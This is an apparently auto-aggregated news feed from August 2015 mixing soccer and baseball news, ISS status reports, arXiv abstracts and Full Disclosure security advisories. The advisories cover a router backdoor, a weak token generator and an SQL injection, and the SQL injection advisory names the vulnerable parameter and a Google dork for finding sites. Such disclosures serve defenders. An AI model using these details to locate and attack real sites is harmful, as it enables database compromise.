from FOX Sports Digital http://ift.tt/1J2sZpU
via IFTTT
from FOX Sports Digital http://ift.tt/1J2sZpU
via IFTTT
Boring no more, Chelsea goes to City embroiled in doc row
LONDON (AP) How Jose Mourinho must long for the days last season when Chelsea was being goaded for being ''boring.'' The start to the new campaign has been anything but mundane at Stamford Bridge.
from FOX Sports Digital http://ift.tt/1TxCRxU
via IFTTT
from FOX Sports Digital http://ift.tt/1TxCRxU
via IFTTT
Augsburg signs Ghana defender Daniel Opare
AUGSBURG, Germany (AP) Augsburg says it has signed Ghana defender Daniel Opare from Porto on a three-year deal.
from FOX Sports Digital http://ift.tt/1Wm1Eco
via IFTTT
from FOX Sports Digital http://ift.tt/1Wm1Eco
via IFTTT
ISS Daily Summary Report – 08/12/15
Direct Current Switching Unit (DCSU) 4A Power On Reset (POR): Tuesday evening at 6:10 pm CDT DCSU-4A experienced a POR. Power was lost to 3 downstream Direct Current-to-Direct Current Converter Units (DDCUs) plus the DDCU on the P4 Integrated Equipment Assembly (IEA). Service Module voltage and current stabilizers [CHT]s 23 and 24 also lost power but [CHT]s 21 and 22 were still available resulting in only a small power deficit to the Russian segment. Of the 3 DDCUs, all were in paralleled pairs, but Parallel Input Undervoltage Protection (PIUV) was enabled for the Node 3 pair, meaning the 1B4A bus lost all power. The loads that lost power included: 4A Pump Flow and Control Subsystem (PFCS), Permanent Multipurpose Module (PMM), Treadmill 2, Hub Control Zone 1 Multiplexer/Demultiplexer (HCZ-1 MDM), Node3-1 MDM, Oxygen Generator System (OGS), Node3 Common Cabin Air Assembly (CCAA), Node3 Moderate Temperature Loop (MTL), Node3 Carbon Dioxide Removal Assembly (CDRA), and [CHT]s 23 and 24. The crew was woken up and, with the loss of the CCAA, were prime for smoke detection in Node 3 and the PMM. Ground teams review the DCSU 4A data and found no indications of hardware problems. Ground teams are still in the process of recovering and reconfiguring Environmental Control and Life Support Systems (ECLSS). Teams have had some issues recovering the Node 3 CDRA. Lab CDRA has been activated in the interim while teams continue troubleshooting. HRP Operations: Kelly and Kornienko performed a Reaction Self-Test upon wake-up and prior to sleep. Kelly completed Observation #10 of the Habitability study and his FD 135 Integrated Resistance and Aerobic Training Study (Sprint) Volume of Oxygen Utilized (VO2) Max session. Reaction Self-Test aids crewmembers to objectively identify when their performance capability is degraded by various fatigue-related conditions that can occur as a result of ISS operations and time in space (e.g., acute and chronic sleep restriction, slam shifts, extravehicular activity (EVA), and residual sedation from sleep medications). Habitability assesses the relationship between crew members and their environment in order to better prepare for future long-duration spaceflights to destinations, such as Near Earth Asteroids (NEA) and Mars. The ultimate goal is to understand how much habitable volume is required for vehicle internal design and layout, and if mission duration impacts the volume needed. Kelly performed his Sprint exercise session on the Cycle Ergometer with Vibration Isolation and Stabilization (CEVIS). The Sprint investigation evaluates the use of high intensity, low volume exercise training to minimize loss of muscle, bone, and cardiovascular function in ISS crewmembers during long-duration missions. Upon completion of this study, investigators expect to provide an integrated resistance and aerobic exercise training protocol capable of maintaining muscle, bone and cardiovascular health while reducing total exercise time over the course of a long-duration space flight. Synchronized Position Hold, Engage, Reorient, Experimental Satellites (SPHERES) Zero Robotics Preparations: Kononenko completed an On-Board Training (OBT) and procedure review in advance of the Zero Robotics Dry-Run scheduled for tomorrow. The SPHERES Zero Robotics investigation establishes an opportunity for high school students to design research for the ISS. As part of a competition, students write algorithms for the SPHERES satellites to accomplish tasks relevant to future space missions. The algorithms are tested by the SPHERES team and the best designs are selected for the competition to operate the SPHERES satellites on board the ISS. Radi-N Neutron Field Study (Radi-N): Kononenko handed over the eight Radi-N detectors to Lindgren who deployed them around the ISS. The objective of this investigation is to better characterize the ISS neutron environment and define the risk posed to crewmembers’ health and provide the data necessary to develop advanced protective measures for future space flight. On-board Training (OBT) H-II Transfer Vehicle (HTV) Robotics Onboard Trainer (ROBoT) Session 1: In preparation for HTV5 arrival scheduled on August 20, Lindgren, Yui and Kelly participated in this training session. The crew practiced a 30 meter approach and two Capture Point hold runs. Japanese Experiment Module (JEM) Pressurized Module (JPM)1F2 Activities: In preparation for the Multi-purpose Small Payload Rack (MSPR) arriving on HTV5 and subsequent installation, Lindgren relocated items stowed in the JPM1F2. Then Yui removed the hard dummy panel and JEM blue stowage rack, replaced the Active Rack Isolation System (ARIS) pivot fitting bottom and installed a soft dummy panel. Mobile Servicing System (MSS) Operations: Today, the Robotics Ground Controllers powered up the Mobile Serving System (MSS) and translated the Mobile Transporter (MT) from Worksite 4 (WS4) to WS5. Prior to the translation they continued the MSS Checkouts in preparation for HTV5 capture on GMT 232 (20 Aug 15). MSS performance today was nominal. Today’s Planned Activities All activities were completed unless otherwise noted. Reaction Time Test (morning) SPRINT – Hardware Warmup ISS Crew / SSIPC FD Conference Countermeasures System (CMS) – Heart Rate Monitor Battery Changeout Formaldehyde Monitoring Kit (FMK) Deployment Ops CMS – HRM – iPAD Configuration GSC Sampling Operations SPRINT Experiment Ops JEM – Relocating JPM1F2 Stowage SPVO2 Cleaning and Relocation Gas Analyzer О2 Readings Adjustments Comm Config prior to MRM1 Ops MRM1 ГК2 Replaceable Unit (БС) R&R r/g 9589 PAO Crew Prep / r/g 9598 JEM – Hard Dummy Panel (HDP) Removal TV-session with Vesty Show Host r/g 9598 Installation of ЗУ-С charger No.13010004 Mating telemetry connectors to ЗУ-С Set up the first Orlan-MK battery pack for discharge and start discharging the first pack JEM – Blue Stowage Rack JBSR Removal from JPM1F2 SEISMOPROGNOZ. Downlink data from Control and Data Acquisition Module r/g 9013 JEM – PIVOT Fitting Replacement Closing USOS Window Shutters HABIT – Hardware Activation JEM – Soft Dummy Panel (SDP) Installation Restoring Nominal Comm Configuration EVA-41 Debrief. (S-band, VHF) SPHERES – OBT OBT – On-board Training (OBT) HTV Robotics Onboard Trainer (ROBoT) Session 1 SPHERES Crew Conference IFM Node 3 Deck Starboard IMV Cleaning ALGOMETRIA. Experiment Ops / r/g 9591 NAPOR-miniRSA. Cleaning БЗУ-М Ventilation Vents / r/g 9593 Setup Disassembly and REMOTE RS LAPTOP stowage (Remote SM CP work station) / r/g 9559 ALGOMETRIA. Experiment […]
from ISS On-Orbit Status Report http://ift.tt/1IK36OB
via IFTTT
from ISS On-Orbit Status Report http://ift.tt/1IK36OB
via IFTTT
Bundesliga starts with Bayern Munich as big favorite
FRANKFURT, Germany (AP) Bayern Munich kicks off the Bundesliga season in the familiar role of favorite for a historic fourth consecutive title despite questions hanging over the future of coach Pep Guardiola.
from FOX Sports Digital http://ift.tt/1h5mMDJ
via IFTTT
from FOX Sports Digital http://ift.tt/1h5mMDJ
via IFTTT
Marseille looking for new coach following Bielsa's departure
PARIS (AP) The season couldn't have started worse for Marseille.
from FOX Sports Digital http://ift.tt/1P8MnWV
via IFTTT
from FOX Sports Digital http://ift.tt/1P8MnWV
via IFTTT
Bayer Leverkusen signs Chile midfielder Charles Aranguiz
LEVERKUSEN, Germany (AP) Bayer Leverkusen has signed Chile midfielder Charles Aranguiz from Brazilian club Internacional on a five-year deal.
from FOX Sports Digital http://ift.tt/1Ncfc6v
via IFTTT
from FOX Sports Digital http://ift.tt/1Ncfc6v
via IFTTT
Lenovo Caught Using Rootkit to Secretly Install Unremovable Software
Two years ago Chinese firm Lenovo got banned from supplying equipment for networks of the intelligence and defense services various countries due to hacking and spying concerns. Earlier this year, Lenovo was caught red-handed for selling laptops pre-installed with Superfish malware. One of the most popular Chinese computer manufacturers ‘Lenovo’ has been caught once again using a hidden
from The Hacker News http://ift.tt/1JVb89s
via IFTTT
from The Hacker News http://ift.tt/1JVb89s
via IFTTT
[FD] Zend Framework <= 2.4.2 XML eXternal Entity Injection (XXE) on PHP FPM
============================================= - Release date: 12.08.2015 - Discovered by: Dawid Golunski - Severity: High - CVE-ID: CVE-2015-5161 ============================================= I. VULNERABILITY
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
Milky Way and Exploding Meteor
Tonight the Perseid Meteor Shower reaches its maximum. Grains of icy rock will streak across the sky as they evaporate during entry into Earth's atmosphere. These grains were shed from Comet Swift-Tuttle. The Perseids result from the annual crossing of the Earth through Comet Swift-Tuttle's orbit, and are typically the most active meteor shower of the year. Although it is hard to predict the level of activity in any meteor shower, in a clear dark sky an observer might see a meteor a minute. This year's Perseids occur just before a new Moon and so the relatively dark sky should make even faint meteors visible. Meteor showers in general are best be seen from a relaxing position, away from lights. Featured here is a meteor caught exploding two weeks ago above Austria next to the central band of our Milky Way Galaxy. via NASA http://ift.tt/1DLQVSs
Wednesday, August 12, 2015
Impact draw Whitecaps 2-2 in Canadian final opener
MONTREAL (AP) Laurent Ciman and Anthony Jackson-Hamel scored in a late 1-minute span to help the Montreal Impact draw 2-2 with the Vancouver Whitecaps in the Canadian Championship final Wednesday.
from FOX Sports Digital http://ift.tt/1L75vqf
via IFTTT
from FOX Sports Digital http://ift.tt/1L75vqf
via IFTTT
[FD] Update: Backdoor and RCE found in 8 TOTOLINK router models
Hello, This is an update to: - Backdoor and RCE found in 8 TOTOLINK router models (http://ift.tt/1HzOWgm ) - Backdoor credentials found in 4 TOTOLINK router models (http://ift.tt/1I56d4K ) - 4 TOTOLINK router models vulnerable to CSRF and XSS attacks (http://ift.tt/1I56fcE ) - 15 TOTOLINK router models vulnerable to multiple RCEs (http://ift.tt/1HzOYVn ) Totolink has released new firmwares on 2015-07-25 and also removed the old firmwares from their website. The backdoor is still present in the new firmware images but it is not launched at the startup anymore. You can check yourself by downloading the images and by using binwalk: Example with N300RH-V2: $ wget -O 'TOTOLINK%20N300RH-V2.0.1_20150725.zip' 'http://ift.tt/1TvG0Oz' $ 7z x TOTOLINK%20N300RH-V2.0.1_20150725.zip [...] $ binwalk -e *web DECIMAL HEXADECIMAL DESCRIPTION
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
Learning to Hire Teams. (arXiv:1508.02823v1 [cs.AI])
Crowdsourcing and human computation has been employed in increasingly sophisticated projects that require the solution of a heterogeneous set of tasks. We explore the challenge of building or hiring an effective team, for performing tasks required for such projects on an ongoing basis, from an available pool of applicants or workers who have bid for the tasks. The recruiter needs to learn workers' skills and expertise by performing online tests and interviews, and would like to minimize the amount of budget or time spent in this process before committing to hiring the team. How can one optimally spend budget to learn the expertise of workers as part of recruiting a team? How can one exploit the similarities among tasks as well as underlying social ties or commonalities among the workers for faster learning? We tackle these decision-theoretic challenges by casting them as an instance of online learning for best action selection. We present algorithms with PAC bounds on the required budget to hire a near-optimal team with high confidence. Furthermore, we consider an embedding of the tasks and workers in an underlying graph that may arise from task similarities or social ties, and that can provide additional side-observations for faster learning. We then quantify the improvement in the bounds that we can achieve depending on the characteristic properties of this graph structure. We evaluate our methodology on simulated problem instances as well as on real-world crowdsourcing data collected from the oDesk platform. Our methodology and results present an interesting direction of research to tackle the challenges faced by a recruiter for contract-based crowdsourcing.
from cs.AI updates on arXiv.org http://ift.tt/1DOeZnD
via IFTTT
OOASP: Connecting Object-oriented and Logic Programming. (arXiv:1508.03032v1 [cs.AI])
Most of contemporary software systems are implemented using an object-oriented approach. Modeling phases -- during which software engineers analyze requirements to the future system using some modeling language -- are an important part of the development process, since modeling errors are often hard to recognize and correct.
In this paper we present a framework which allows the integration of Answer Set Programming into the object-oriented software development process. OOASP supports reasoning about object-oriented software models and their instantiations. Preliminary results of the OOASP application in CSL Studio, which is a Siemens internal modeling environment for product configurators, show that it can be used as a lightweight approach to verify, create and transform instantiations of object models at runtime and to support the software development process during design and testing.
from cs.AI updates on arXiv.org http://ift.tt/1DOeZnB
via IFTTT
Trend Filtering on Graphs. (arXiv:1410.7690v4 [stat.ML] UPDATED)
We introduce a family of adaptive estimators on graphs, based on penalizing the $\ell_1$ norm of discrete graph differences. This generalizes the idea of trend filtering [Kim et al. (2009), Tibshirani (2014)], used for univariate nonparametric regression, to graphs. Analogous to the univariate case, graph trend filtering exhibits a level of local adaptivity unmatched by the usual $\ell_2$-based graph smoothers. It is also defined by a convex minimization problem that is readily solved (e.g., by fast ADMM or Newton algorithms). We demonstrate the merits of graph trend filtering through examples and theory.
from cs.AI updates on arXiv.org http://ift.tt/ZXUQsd
via IFTTT
Orioles Video: Baltimore no-hit by Hisashi Iwakuma of Mariners; first time team no-hit since 2007 (Clay Buchholz) (ESPN)
from ESPN http://ift.tt/1eW1vUH
via IFTTT
via IFTTT
Videos of racism in English soccer can be uploaded to app
LONDON (AP) Fans and players in England who experience or witness racism or discrimination at soccer games or on social media will be able to upload videos and pictures of incidents via a mobile phone application.
from FOX Sports Digital http://ift.tt/1UDFgcI
via IFTTT
from FOX Sports Digital http://ift.tt/1UDFgcI
via IFTTT
Mariners: Hisashi Iwakuma's no-hitter was the team's 5th in franchise history and 3rd in last 4 seasons (ESPN)
from ESPN http://ift.tt/1eW1vUH
via IFTTT
via IFTTT
Breaking: Mariners P Hisashi Iwakuma throws no-hitter against Orioles; 7 K, 116 pitches in first career complete game (ESPN)
from ESPN http://ift.tt/1eW1vUH
via IFTTT
via IFTTT
Mariners P Hisashi Iwakuma has no-hitter in 9th inning vs. Orioles; tune to SportsCenter on ESPN (ESPN)
from ESPN http://ift.tt/1eW1vUH
via IFTTT
via IFTTT
Breaking: Mariners P Hisashi Iwakuma has a no-hitter through 8 innings against the Orioles; 7 K, 107 pitches (ESPN)
from ESPN http://ift.tt/1eW1vUH
via IFTTT
via IFTTT
Hearts goes top of Scottish league as Celtic draws
GLASGOW, Scotland (AP) Hearts went top of the Scottish league on Wednesday after Celtic conceded a late penalty in a 2-2 draw against Kilmarnock.
from FOX Sports Digital http://ift.tt/1IHORK4
via IFTTT
from FOX Sports Digital http://ift.tt/1IHORK4
via IFTTT
I have a new follower on Twitter
Miles Anthony Smith
Husband/Father, #Ambivert, #SerialSpecialist, Digital Marketer & #Audiobook Author Why #Leadership Sucks & Becoming #Generation Flux http://t.co/FUkXa8Pxil
Green Bay, Wisconsin
http://t.co/NAXy3aaINK
Following: 3122 - Followers: 3995
August 12, 2015 at 05:53PM via Twitter http://twitter.com/Miles_Anthony
MLB: Mariners P Hisashi Iwakuma has a no-hitter through 7 innings against the Orioles; 6 K, 90 pitches (ESPN)
from ESPN http://ift.tt/1eW1vUH
via IFTTT
via IFTTT
Measuring the Longitudinal Evolution of the Online Anonymous Marketplace Ecosystem
successful online anonymous marketplace, in which buy- ers and sellers could transact with anonymity properties far superior to those available in ...
from Google Alert - anonymous http://ift.tt/1P7iXbG
via IFTTT
from Google Alert - anonymous http://ift.tt/1P7iXbG
via IFTTT
Anonymous Malaysia wants PM Najib Razak to resign, threatens cyber attack on Aug 29 , AsiaOne ...
Security at the information networks of 10 vital public-sector agencies is being tightened after hacktivist group Anonymous Malaysia threatened to ...
from Google Alert - anonymous http://ift.tt/1DNDJfR
via IFTTT
from Google Alert - anonymous http://ift.tt/1DNDJfR
via IFTTT
[FD] The OAuth2 Complete plugin for WordPress uses a pseudorandom number generator which is non-cryptographically secure (WordPress plugin)
Details ================ Software: OAuth2 Complete For WordPress Version: 3.1.3 Homepage: http://ift.tt/1deB0fP Advisory report: http://ift.tt/1JdcUnH CVE: Awaiting assignment CVSS: 10 (High; AV:N/AC:L/Au:N/C:C/I:C/A:C) Description ================ The OAuth2 Complete plugin for WordPress uses a pseudorandom number generator which is non-cryptographically secure Vulnerability ================ The following refer to the generateAccessToken() function in library/OAuth2/ResponseType/AccessToken.php, and the generateAuthorizationCode() function in library/OAuth2/ResponseType/AuthorizationCode.php. These functions attempt to generate secure auth tokens, but do not use the WordPress random number generator. Instead they use a series of fallback calculations depending on which PHP version is being used. Some of these calculations are not crypographically secure: The first is mcrypt_create_iv(100, MCRYPT_DEV_URANDOM). MCRYPT_DEV_URANDOM is expected to change to a different random value whenever it is called, but on Windows, on older versions of php it is known to be a constant value if no other functions (e.g. /dev/urandom) are available then the access token is generated solely using mt_rand(), microtime(), and uniqid(). mt_rand() (Mersenne twister) is not a cryptographically secure pseudorandom number generator. According to the documentation mt_rand() is also biassed towards even return values in some circumstances. According to the documentation uniqid() is as secure a PRNG as microtime(). Proof of concept ================ See the documentation: http://ift.tt/1IHnLTn http://ift.tt/1ntsSyj Mitigations ================ Upgrade to version 3.1.5 or later. If this is not possible then ensure that you are using a recent version of php (at least 5.3), or disable the plugin. Disclosure policy ================ dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: http://ift.tt/1B6NWzd Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report with 14 days. Timeline ================ 2014-04-16: Discovered 2015-07-21: Reported to vendor by email 2015-07-21: Requested CVE 2015-08-10: Vendor responded 2015-08-11: Vendor confirmed fixed in version 3.1.5 2015-08-12: Published Discovered by dxw: ================ Tom Adams Please visit security.dxw.com for more information.
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
[FD] BFS-SA-2015-001: Internet Explorer CTreeNode::GetCascadedLang Use-After-Free Vulnerability
Blue Frost Security GmbH http://ift.tt/1IH5eGS research(at)bluefrostsecurity.de BFS-SA-2015-001 12-August-2015
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
[FD] Open source tool for applying Google Chrome security updates
The Problem If you are a network administrator, keeping browser updated is the first thing to do for security. Chrome is a very good browser, but it's a little bit complicated to answer this simple question: what is the version of the latest stable Chrome? And for people in places such as China(no Google services), updating Chrome is not an easy task. The Solution The official blog of Chrome Releases contains a lot of information. Code of this project extracts the version number from the official blog, downloads offline installers from the official website if it's a new version, and checks whether visitor's Chrome is exactly the same. Security The best part of this project - users do not need to download and run software to be checked. This project does not even contain JavaScript. URLs Source Code http://ift.tt/1JUaf18 Home Page http://ift.tt/1JLvphJ Latest Stable Chrome http://ift.tt/1Nr14nJ
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
Mariners: RF Nelson Cruz is not in Wednesday's lineup vs. Orioles after leaving Tuesday's game with neck spasms (ESPN)
from ESPN http://ift.tt/1eW1vUH
via IFTTT
via IFTTT
I have a new follower on Twitter
Traci Jones
The reports of my death have been greatly exaggerated.
Los Angeles
Following: 524 - Followers: 354
August 12, 2015 at 03:07PM via Twitter http://twitter.com/TraciJones79
Costa Rican national team coach Wanchope resigns following fight at game in Panama
SAN JOSE, Costa Rica (AP) Costa Rican national team coach Wanchope resigns following fight at game in Panama.
from FOX Sports Digital http://ift.tt/1MkBtxW
via IFTTT
from FOX Sports Digital http://ift.tt/1MkBtxW
via IFTTT
Mariano Nunez (@marianonunezdc) favorited one of your Tweets!
@mistermcguire: [FD] [Onapsis Security Advisory 2015-012] SAP Mobile Platform DataVault Predictable Encryption Password for Secure… Mariano Nunez favorited your Tweet. View Patrick McGuire @mistermcguire = [FD] [Onapsis Security Advisory 2015-012] SAP Mobile Platform DataVault Predictable Encryption Password for Secure… ift.tt/1IZjmIG Settings | Help | Opt-out | Download app Twitter, Inc. 1355 Market Street, Suite 900 San Francisco, CA 94103
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
Find a Meeting
This is the full meeting database, ideally more up to date than the printed meeting list. If you have any problems finding meetings, please call the ...
from Google Alert - anonymous http://ift.tt/1L664AP
via IFTTT
from Google Alert - anonymous http://ift.tt/1L664AP
via IFTTT
I have a new follower on Twitter
Flow
Rapidly Design and Deploy Custom Cloud Based Data Automation Solutions.
https://t.co/HixZvF6akh
Following: 1157 - Followers: 769
August 12, 2015 at 12:35PM via Twitter http://twitter.com/flow_analytics
[FD] [Onapsis Security Advisory 2015-012] SAP Mobile Platform DataVault Predictable Encryption Password for Secure Storage
Source: Gmail -> IFTTT-> Blogger
[FD] [Onapsis Security Advisory 2015-010] SAP Mobile Platform DataVault Keystream Recovery
Source: Gmail -> IFTTT-> Blogger
Messi, Suarez, Ronaldo in running for UEFA Best Player award
NYON, Switzerland (AP) Lionel Messi and Luis Suarez of Champions League winner Barcelona will compete with Real Madrid's Cristiano Ronaldo for UEFA's Best Player in Europe award for last season.
from FOX Sports Digital http://ift.tt/1WiHXSQ
via IFTTT
from FOX Sports Digital http://ift.tt/1WiHXSQ
via IFTTT
Costa Rica coach Wanchope in stadium fist fight
PANAMA CITY (AP) Costa Rica coach Paulo Wanchope has found himself in a fist fight while watching his country's under-23 team play in Panama.
from FOX Sports Digital http://ift.tt/1IGrPn5
via IFTTT
from FOX Sports Digital http://ift.tt/1IGrPn5
via IFTTT
ISS Daily Summary Report – 08/11/15
Human Research Program (HRP) Operations: Yui completed his Flight Day 15 (FD15) Biochemical Profile Urine collections. Kelly completed his second of three Journals sessions and his third task observation video for Habitability. The Biochemical Profile experiment tests blood and urine samples obtained from astronauts before, during, and after spaceflight. Specific proteins and chemicals in the samples are used as biomarkers, or indicators of health. Post-flight analysis yields a database of samples and test results which scientists can use to study the effects of spaceflight on the body. Journals obtains information on behavioral and human issues that are relevant to the design of equipment and procedures and sustained human performance during extended-duration missions. Study results provide information to help prepare for future missions to low-Earth orbit and beyond. Habitability assesses the relationship between crew members and their environment in order to better prepare for future long-duration spaceflights to destinations, such as Near Earth Asteroids (NEA) and Mars. The ultimate goal is to understand how much habitable volume is required for vehicle internal design and layout, and if mission duration impacts the volume needed. Observations during the 1-year mission, as well as 6-month missions, can help spacecraft designers understand how much habitable volume is required, and whether a mission’s duration impacts how much space crew members need. Capillary Effects of Drinking in the Microgravity Environment (Capillary Beverage): Microgravity affects the way fluids behave, and as such, crew members must drink from special sealed bags instead of using straws or normal cups. Capillary Beverage studies the process of drinking from specially designed space cups that use fluid dynamics to mimic the effect of gravity. In this session, Yui used water to demonstrate how a complex fluid reacts to the cup’s special designs in an attempt to mimic the gravitational flow of a liquid through capillary forces. High definition video was used to capture the data ground for ground analysis. Integrated Resistance and Aerobic Training Study (SPRINT) Configuration: Kelly and Yui configured the Portable Pulmonary Function System (PPFS) in advance of the Sprint Volume of Oxygen Utilized (VO2) Max sessions on Wednesday for Kelly and Thursday for Yui. Sprint evaluates the use of high intensity, low volume exercise training to minimize loss of muscle, bone, and cardiovascular function in International Space Station (ISS) crewmembers during long-duration missions. Extravehicular Activity (EVA) Tool Stow: Kelly stowed US tools used by the Russian crew during yesterday’s Russian EVA #41. Oxygen Generation Assembly (OGA) Hydrogen Sensor Remove and Replace (R&R): Last Thursday’s Velocicalc reading of the air flow rate into the OGS Rack AAA showed it to be below 450 ft/min versus the expected range of 900 ft/min. Sufficient air flow through the OGS Rack serves as a hazard mitigation against oxygen (O2) concentrations forming within the rack should an O2 leak develop. Following discussions within the engineering and operations community, a short term recommendation was made to continue running the OGA to retain O2 production but increase the AAA fan speed to help increase air mixing within the rack. Over the weekend the crew took another reading and found the flow to still be less than 450 ft/min. The team decide to power off the OGS rack after the crew day on Sunday. Today Lindgren R&Rd the OGS Hydrogen Sensor Orbital Replacement Unit (ORU), as well as AAA cleaning and inlet inspection to recover OGA functionality. The team is currently reactivating the OGA and the crew will perform velocicalc readings on Thursday. Water Recovery System (WRS) Separator Plumbing Assembly (SPA) Vent Line Build: For several months, ground teams have suspected the SPA vent hose is restricted due to microbial growth. There is no microbial control in the purge lines and no designated way to clean them if growth occurs. Since there are no spare SPA vent hose onboard, today Kelly built an alternate SPA Vent Line by removing the end fittings from an existing Iodine Removal Hose. Later this week the crew will install this hose to eliminate the restriction and return the Urine Processing Assembly (UPA) to nominal operations. Space Station Remote Manipulator System (SSRMS) Operations: Today, the Robotics Ground Controllers powered up the Mobile Serving System (MSS) and maneuvered the SSRMS to stow the Special Purpose Dexterous Manipulator (SPDM) on the Lab Power Data Grapple Fixture (PDGF). SSRMS Latching End Effector B (LEE-B) was then released from the SPDM PDGF and the SSRMS was maneuvered into position for the start of the ISS Crew H-II Transfer Vehicle 5 (HTV5) Offset Grapples Practice on GMT 225 (13 Aug 15). The Robotics Ground Controllers also performed MSS Checkouts in preparation for HTV5 capture on GMT 232 (20 Aug 15). MSS performance today was nominal. Today’s Planned Activities All activities were completed unless otherwise noted. HRF – Sample MELFI Insertion USOS Window Shutter closure ISS HAM. Radio activation JRNL – Log Entry HRF – Hardware Stowage After Sampling Crew preparation for PAO Hardware preparation for PAO PAO PHS Hardware installation Periodic Health Status (PHS) Evaluation – CMO Periodic Health Status (PHS) Evaluation – Subject Tag up with specialists on “Orlan” spacesuit after EVA ВКД Periodic Health Status (PHS) Evaluation – Subject Periodic Health Status (PHS) Evaluation – CMO Data Recording on Periodic Health Status (PHS) Evaluation and Hardware stowage EDV (КОВ) Fill (separation) for “Elektron” System or EDV-CB Fill installed EDV (КОВ) 1137 from ЕDV 1005 US video camera, light and REBA power unit de-installation from spacesuits r/g 9529, 9530 WRS – Recycle Tank Fill “Orlan-МК” Spacesuit water supply line drying Charging D2Xs camera batteries for ВСАТ HRF- reconfig “Elektron-BM” [БЖ] (Liquid compartment) Pressurization prior to activation CAPBEV- Preparation Ops Water Tank Refill of Spacesuits ##4 and 6 HABIT – Videorecording Start OGA: hydrogen sensor R&R, part 1 “Оrlan-МК” Spacesuit Drying – Start SPRINT- Program Loading HABIT – Videorecording End CAPBEV Progress #428 and DC1 Interface Leak Check Medical Kit Return to Nominal Stowage Location After EVA / r/g 9562 WRS – SPA Ventilation Line Configuration CAPBEV- Equipment Test Photography […]
from ISS On-Orbit Status Report http://ift.tt/1L5FzLJ
via IFTTT
from ISS On-Orbit Status Report http://ift.tt/1L5FzLJ
via IFTTT
[FD] bizidea Design CMS 2015Q3 - SQL Injection Vulnerability
Document Title: =============== bizidea Design CMS 2015Q3 - SQL Injection Vulnerability References (Source): ==================== http://ift.tt/1HFGTxl Release Date: ============= 2015-08-12 Vulnerability Laboratory ID (VL-ID): ==================================== 1571 Common Vulnerability Scoring System: ==================================== 8.7 Product & Service Introduction: =============================== http://ift.tt/1N9VCaK Abstract Advisory Information: ============================== An indepndent vulnerability laboratory researcher discovered a remote sql injection web vulnerability in the official bizidea Design content management system. Vulnerability Disclosure Timeline: ================================== 2015-08-12: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Bizidea Co. Ltd. Product: BizIdea - Content Management System (Web-Application) 2015 Q3 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A remote sql injection web vulnerability has been discovered in the official bizidea Design content management system. The vulnerability allows remote attackers to execute own sql commands to compromise the web-applicaation or database management system. The vulnerability is located in the `news_id` value of the `index.php` file. Remote attackers are able to execute own sql commands by manipulation of the GET method request with the vulnerable news_id parameter. The request method to inject the sql command is GET and the issue is located on the application-side of the online-service. The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.7. Exploitation of the remote sql injection web vulnerability requires no user interaction or privilege web-application user account. Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise. Request Method(s): [+] GET Vulnerable File(s): [+] index.php Vulnerable Parameter(s): [+] news_id Proof of Concept (PoC): ======================= The sql injection web vulnerability can be exploited by remote attackers without privilege application user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Admin UI: /admin Google Dork(s): "Powered by bizidea.co.th" PoC: http://ift.tt/1HGbwmh SQL INJECTION VULNERABILITY!] Solution - Fix & Patch: ======================= The sql injection vulnerability can be patched by usage of a secure prepared statement or entity on requests via GET with the vulnerable news_id value. Disallow special chars and escape to filter the input of the parameter. Security Risk: ============== The security risk of the remote sql injection web vulnerability in the bizidea content management system is estimated as high. (CVSS 8.7) Credits & Authors: ================== wild.soldier(behrouz mansoori) - Danger Security Team SPT: Nima Danger , Mehran_FLash and all Members ... Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
Czech captain Tomas Rosicky could miss Euro 2016 qualifiers
PRAGUE (AP) Czech Republic captain Tomas Rosicky could miss European Championship qualifiers against Kazakhstan and Latvia in September.
from FOX Sports Digital http://ift.tt/1HG2vcJ
via IFTTT
from FOX Sports Digital http://ift.tt/1HG2vcJ
via IFTTT
Soccer player treated for cancer wins case over stopped pay
LAUSANNE, Switzerland (AP) A football player whose contract was suspended by his club while he was treated for cancer has been awarded ''moral damages'' of around $60,000.
from FOX Sports Digital http://ift.tt/1L5sZMG
via IFTTT
